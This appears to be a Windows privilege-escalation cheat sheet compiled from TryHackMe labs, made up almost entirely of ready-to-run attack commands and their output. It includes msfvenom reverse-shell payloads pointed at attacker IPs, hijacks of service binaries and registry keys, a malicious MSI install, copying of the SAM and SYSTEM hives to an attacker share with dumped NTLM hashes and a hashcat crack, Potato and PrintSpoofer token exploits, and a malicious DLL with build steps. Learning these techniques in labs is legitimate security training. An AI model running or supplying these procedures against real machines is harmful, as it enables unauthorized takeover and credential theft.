Skip to content

Windows Privesc

Tools

Reverse shell

Using msfvenom :

$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.9.52.128 LPORT=8888 -f exe -o revshell.exe

Using nishang.

Exploit suggester

Windows-Exploit-Suggester

$ git clone https://github.com/AonCyberLabs/Windows-Exploit-Suggester
$ cd Windows-Exploit-Suggester
$ python2 windows-exploit-suggester.py --update
$ # python2 -m pip install xlrd==1.1.0
$ python2 windows-exploit-suggester.py --database 2021-12-11-mssb.xls --ostext 'Windows 2012 R2 (6.3 Build 9600)'
or
$ python2 windows-exploit-suggester.py --database 2021-12-11-mssb.xls --systeminfo sysinfo_output.txt

WES-NG

$ python3 -m pip install wesng
$ wesng --update

PS> systeminfo > systeminfo.txt

$ wesng systeminfo.txt

Metasploit

Post exploitation module : multi/recon/local_exploit_suggester.

Services

Unquoted path

  • C:\Program.exe
  • C:\Program Files\Unquoted.exe
  • C:\Program Files\Unquoted Path Service\Common.exe
  • C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe
C:\PrivEsc>sc qc unquotedsvc
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: unquotedsvc
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 3   DEMAND_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Unquoted Path Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

# Check if we can write into the folder
C:\PrivEsc>accesschk.exe /accepteula -uwdq "C:\Program Files\Unquoted Path Service\"
C:\Program Files\Unquoted Path Service
  Medium Mandatory Level (Default) [No-Write-Up]
  RW BUILTIN\Users
  RW NT SERVICE\TrustedInstaller
  RW NT AUTHORITY\SYSTEM
  RW BUILTIN\Administrators

# Copy reverse shell
C:\PrivEsc>copy C:\Users\user\revshell.exe "C:\Program Files\Unquoted Path Service\Common.exe"
        1 file(s) copied.

C:\PrivEsc>net start unquotedsvc
...

Insecure service permissions

List permission using sc.

C:\> sc sdshow <service>

D:(A;;CCLCSWLORC;;;**AU**)(A;;CCLCSWRPDTLOCRRCWDWO;;;**BA**)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;**SY**)(A;;CCLCSWLORC;;;**BU**)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;**WD**)

More information about security descriptors.


List permissions of a user using accesschk.exe.

C:\> accesschk.exe /accepteula -wuvc <service>

C:\> accesschk.exe /accepteula -wuvc daclsvc
RW daclsvc
        SERVICE_QUERY_STATUS
        SERVICE_QUERY_CONFIG
        SERVICE_CHANGE_CONFIG
        SERVICE_INTERROGATE
        SERVICE_ENUMERATE_DEPENDENTS
        SERVICE_START
        SERVICE_STOP
        READ_CONTROL

SERVICE_CHANGE_CONFIG : Change the service configuration.

# Check the service 'daclsvc' configuration (qc : query configuration)
C:\PrivEsc>sc qc daclsvc
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: daclsvc
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 3   DEMAND_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : "C:\Program Files\DACL Service\daclservice.exe"
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : DACL Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

# Change the binpath value
C:\PrivEsc>sc config daclsvc binpath="\"C:\Users\user\revshell.exe\""
[SC] ChangeServiceConfig SUCCESS

C:\PrivEsc>sc qc daclsvc
[...]
        BINARY_PATH_NAME   : "C:\Users\user\revshell.exe"
[...]

# Start the service 'daclsvc'
C:\PrivEsc>net start daclsvc

Faster way :

C:\> sc config daclsvc binpath= "net localgroup administrators user /add"
C:\> sc start daclsvc

# Then
C:\> net localgroup administrators

Insecure registry permissions

Add registy keys :

C:\PrivEsc>sc qc regsvc
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: regsvc
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 3   DEMAND_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : "C:\Program Files\Insecure Registry Service\insecureregistryservice.exe"
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Insecure Registry Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

# regsvc service is writable by the "NT AUTHORITY\INTERACTIVE" group (essentially all logged-on users)
C:\PrivEsc>accesschk.exe /accepteula -uvwqk HKLM\System\CurrentControlSet\Services\regsvc
HKLM\System\CurrentControlSet\Services\regsvc
  Medium Mandatory Level (Default) [No-Write-Up]
  RW NT AUTHORITY\SYSTEM
        KEY_ALL_ACCESS
  RW BUILTIN\Administrators
        KEY_ALL_ACCESS
  RW NT AUTHORITY\INTERACTIVE
        KEY_ALL_ACCESS

# Add registry key to execute reverse shell
C:\PrivEsc>reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d C:\Users\User\revshell.exe /f
The operation completed successfully.

C:\PrivEsc>net start regsvc
...

Insecure file permissions

Service binary file is writable by everyone (BUILTIN\Users) :

C:\PrivEsc>sc qc filepermsvc
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: filepermsvc
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 3   DEMAND_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : "C:\Program Files\File Permissions Service\filepermservice.exe"
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : File Permissions Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\PrivEsc>accesschk.exe /accepteula -quvw "C:\Program Files\File Permissions Service\filepermservice.exe"
C:\Program Files\File Permissions Service\filepermservice.exe
  Medium Mandatory Level (Default) [No-Write-Up]
  RW Everyone
        FILE_ALL_ACCESS
  RW NT AUTHORITY\SYSTEM
        FILE_ALL_ACCESS
  RW BUILTIN\Administrators
        FILE_ALL_ACCESS
  RW WIN-QBA94KB3IOF\Administrator
        FILE_ALL_ACCESS
  RW BUILTIN\Users
        FILE_ALL_ACCESS

# Replace service binary file by a reverse shell
C:\PrivEsc>copy C:\Users\user\revshell.exe "C:\Program Files\File Permissions Service\filepermservice.exe"
Overwrite C:\Program Files\File Permissions Service\filepermservice.exe? (Yes/No/All): Yes
Yes
        1 file(s) copied.

C:\PrivEsc>net start filepermsvc
...

Autoruns

List autoruns :

C:\Users\user>wmic startup get caption,command
Caption         Command
SecurityHealth  %windir%\system32\SecurityHealthSystray.exe
My Program      "C:\Program Files\Autorun Program\program.exe"

If you can overwrite C:\Program Files\Autorun Program\program.exe, you can replace it by your reverse shell and wait for the administrator to log in.

AlwaysInstallElevated

You can use the AlwaysInstallElevated policy to install a Windows Installer package with elevated (system) privileges (docs : link).

To install a package with elevated (system) privileges, set the AlwaysInstallElevated value to "1" under both of the following registry keys:

  • HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
  • HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer
C:\Users\user>reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer
    AlwaysInstallElevated    REG_DWORD    0x1
C:\Users\user>reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer
    AlwaysInstallElevated    REG_DWORD    0x1

Exploitation :

# Attacker host
$ msfvenom -p windows/x64/shell_reverse_tcp \
    LHOST=10.9.52.138 LPORT=9000 -f msi -o reverse_installer.msi

# Victim host
c:\Users\user>msiexec /qn /i "C:\Users\user\reverse_installer.msi"

Application running as admin

PS C:\Users\user> tasklist /V | findstr paint
mspaint.exe 4352 RDP-Tcp#0 2 61,256 K Running WIN-QBA94KB3IOF\admin 0:00:10 Untitled - Paint

Open file://c:/windows/system32/cmd.exe in MS Paint "open file dialog".

Saved credentials

PS C:\Users\user> cmdkey /list

Currently stored credentials:

  Target: WindowsLive:target=virtualapp/didlogical
  Type: Generic
  User: 02nfpgrklkitqatu
  Local machine persistence

  Target: Domain:interactive=WIN-QBA94KB3IOF\admin
  Type: Domain Password
  User: WIN-QBA94KB3IOF\admin

PS C:\Users\user> runas /savecred /user:admin cmd.exe
Attempting to start cmd.exe as user "WIN-QBA94KB3IOF\admin" ...

Security Account Manager (SAM)

PS C:\Users\user> copy C:\Windows\Repair\SAM \\10.9.52.138\\tmpshare
PS C:\Users\user> copy C:\Windows\Repair\SYSTEM \\10.9.52.138\\tmpshare

Then :

$ git clone https://github.com/Tib3rius/creddump7
Cloning into 'creddump7'...
[...]
$ python3 creddump7/pwdump.py SYSTEM SAM
Administrator:500:aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:6ebaa6d5e6e601996eefe4b6048834c2:::
user:1000:aad3b435b51404eeaad3b435b51404ee:91ef1073f6ae95f5ea6ace91c09a963a:::
admin:1001:aad3b435b51404eeaad3b435b51404ee:a9fdfa038c4b75ebc76dc855dd74f0da:::
$ hashcat -m 1000 <hash> /usr/share/wordlists/rockyou.txt
[...]

Scheduled Tasks

Writable scripts

Startup apps

Folder "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp".

If Writable, you can add your reverse shell EXE file. Then, wait for a higher privilege user to log on.

Privileges

  • SeImpersonatePrivilege
  • SeAssignPrimaryPrivilege
  • SeTcbPrivilege
  • SeBackupPrivilege
  • SeRestorePrivilege
  • SeCreateTokenPrivilege
  • SeLoadDriverPrivilege
  • SeTakeOwnershipPrivilege
  • SeDebugPrivilege

Docs : - Access Tokens

Two types of access tokens:

  • Primary access tokens : those associated with a user account that are generated on log on.
  • Impersonation tokens : Allow a particular process (or thread in a process) to gain access to resources using the token of another (user/client) process.

Potato exploit (Rogue potato, Juicy potato, ...)

Rogue Potato :

  • >= Windows 10 1809
  • >= Windows Server 2019

Juicy Potato :

  • < Windows 10 1809
  • < Windows Server 2019

Privileges : SeAssignPrimaryToken or SeImpersonateprivilege

Command to check privileges : whoami /priv

Exploitation :

Redirect attacker:135 to victim:9999 :

  • sudo socat tcp-listen:135,reuseaddr,fork tcp:10.10.13.238:9999

Exploit Rogue potato :

  • .\RoguePotato.exe -r <attacker_ip> -e "C:\path\reverse.exe" -l 9999

PrintSpoofer

Privileges : SeAssignPrimaryToken or SeImpersonateprivilege

.\PrintSpoofer.exe -c "C:\Windows\System32\cmd.exe" -i

Tater (powershell implementation)

C:\> powershell.exe -nop -ep bypass
PS C:\> Import-Module C:\Users\User\Desktop\Tools\Tater\Tater.ps1
PS C:\> Invoke-Tater -Trigger 1 -Command "net localgroup administrators user /add"

# Check
PS C:\> net localgroup administrators

DLL Hijacking

  • https://docs.microsoft.com/en-us/sysinternals/downloads/procmon

DLL hijacking requires an application (typically an exe file) that either has a missing DLL file, or where the search order can be used to insert the malicious DLL file.

In summary, for standard desktop applications, Windows will follow one of the orders listed below depending on if the SafeDllSearchMode is enabled or not.

If SafeDllSearchMode is enabled, the search order is as follows:

  1. The directory from which the application loaded.
  2. The system directory. Use the GetSystemDirectory function to get the path of this directory.
  3. The 16-bit system directory. There is no function that obtains the path of this directory, but it is searched.
  4. The Windows directory. Use the GetWindowsDirectory function to get the path of this directory.
  5. The current directory.
  6. The directories that are listed in the PATH environment variable. Note that this does not include the per-application path specified by the App Paths registry key. The App Paths key is not used when computing the DLL search path.

If SafeDllSearchMode is disabled, the search order is as follows:

  1. The directory from which the application loaded.
  2. The current directory.
  3. The system directory. Use the GetSystemDirectory function to get the path of this directory.
  4. The 16-bit system directory. There is no function that obtains the path of this directory, but it is searched.
  5. The Windows directory. Use the GetWindowsDirectory function to get the path of this directory.
  6. The directories that are listed in the PATH environment variable. Note that this does not include the per-application path specified by the App Paths registry key. The App Paths key is not used when computing the DLL search path.

Malicious DDL :

#include <windows.h>

BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved) {
    if (dwReason == DLL_PROCESS_ATTACH) {
        system("cmd.exe /k whoami > C:\\Temp\\dll.txt");
        ExitProcess(0);
    }
    return TRUE;
}

Compilation using mingw compiler (apt install gcc-mingw-w64-x86-64) :

$ x86_64-w64-mingw32-gcc windows_dll.c -shared -o output.dll

References

  • https://tryhackme.com/room/windows10privesc
  • https://tryhackme.com/room/winprivesc